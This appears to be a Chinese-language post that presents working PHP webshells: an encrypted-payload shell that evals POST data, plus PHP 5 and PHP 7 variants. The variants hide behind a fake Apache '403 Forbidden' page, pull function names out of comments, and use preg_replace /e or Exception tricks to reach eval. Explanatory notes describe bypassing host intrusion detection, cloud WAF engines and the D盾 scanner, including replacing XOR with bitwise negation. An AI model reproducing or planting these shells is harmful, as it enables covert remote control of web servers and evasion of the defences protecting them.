原始webshell
<?php
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$bs="base64_"."decode";
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i] = $after[$i]^$key[$i+1&15];
}
return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
bypass HIDS处理(PHP 5)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at Port 80</address>
</body></html>
<?php
/**preg_replace file_get_contents base64_decode*/
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$e=new SplFileObject(__FILE__);
$e->seek(11);
$bs=substr($e,34,13);
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i]^$key[$i+1&15];
}
return $after;
}
$f="RF0VCR0WDwsSQBA=";
$a = new SplFileObject(__FILE__);
$c=new SplFileObject(__FILE__);
$a->seek(11);
$c->seek(11);
$b = substr($a, 3, 12);
$c=substr($c,16,17);
echo Decrypt($f);
@$post=Decrypt(@$c(Decrypt($f)));
@$b('/ad/e','@'.Decrypt('UUMEXw==').'($post)', 'add');
PHP 7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at Port 80</address>
</body></html>
<?php
/**file_get_contents base64_decode RF0VCR0WDwsSQBA=*/
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$e=new SplFileObject(__FILE__);
$e->seek(11);
$bs=substr($e,21,13);
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i]^$key[$i+1&15];
}
return $after;
}
$c=new SplFileObject(__FILE__);
$c->seek(11);
$c=substr($c,3,17);
$f=new SplFileObject(__FILE__);
$f->seek(11);
$f=substr($f,35,16);
$post=Decrypt($c(Decrypt($f)));
$post=new Exception($post);
eval($post->getMessage());
核心:php5使用preg_replace /e模式 混淆eval,其他函数关键词从注释中获取使得绕过动态引擎
检测(长亭牧云,阿里云盾),打乱变量函数调用形式绕过静态引擎检测(D盾等)
现在D盾可疑一级,经过测试发现文件中含有^符号,就会直接报一级,一个小姿势绕过。
PHP 5
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at Port 80</address>
</body></html>
<?php
/**preg_replace file_get_contents base64_decode*/
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$e=new SplFileObject(__FILE__);
$e->seek(11);
$bs=substr($e,34,13);
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$keyIndex = ($i + 1) & 15;
$after[$i] =($after[$i] & ~$key[$keyIndex]) | ($key[$keyIndex] & ~$after[$i]);
}
return $after;
}
$f="RF0VCR0WDwsSQBA=";
$a = new SplFileObject(__FILE__);
$c=new SplFileObject(__FILE__);
$a->seek(11);
$c->seek(11);
$b = substr($a, 3, 12);
$c=substr($c,16,17);
echo Decrypt($f);
@$post=Decrypt(@$c(Decrypt($f)));
@$b('/ad/e','@'.Decrypt('UUMEXw==').'($post)', 'add');
PHP7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at Port 80</address>
</body></html>
<?php
/**file_get_contents base64_decode RF0VCR0WDwsSQBA=*/
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$e=new SplFileObject(__FILE__);
$e->seek(11);
$bs=substr($e,21,13);
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$keyIndex = ($i + 1) & 15;
$after[$i] =($after[$i] & ~$key[$keyIndex]) | ($key[$keyIndex] & ~$after[$i]);
}
return $after;
}
$c=new SplFileObject(__FILE__);
$c->seek(11);
$c=substr($c,3,17);
$f=new SplFileObject(__FILE__);
$f->seek(11);
$f=substr($f,35,16);
$post=Decrypt($c(Decrypt($f)));
$post=new Exception($post);
eval($post->getMessage());
原理:使用取反~实现和^相同效果的代替方案。
连接截图: